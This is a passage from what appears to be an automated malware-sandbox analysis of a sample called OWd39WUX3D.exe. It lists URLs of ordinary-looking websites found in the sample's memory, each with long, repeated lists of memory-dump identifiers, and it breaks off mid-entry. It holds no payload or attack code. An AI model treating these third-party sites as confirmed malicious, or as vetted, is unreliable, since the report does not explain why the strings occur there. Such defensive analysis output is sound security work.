00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10198_hflip.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10533_hflip.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10653_hflip.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.5
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/wlwmanifest.xml
              Source: OWd39WUX3D.exe, 00000000.00000003.393036603.0000000006B5F000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-json/
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/xmlrpc.php?rsd
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.615816939.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.visa.no
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/-
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/r1
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 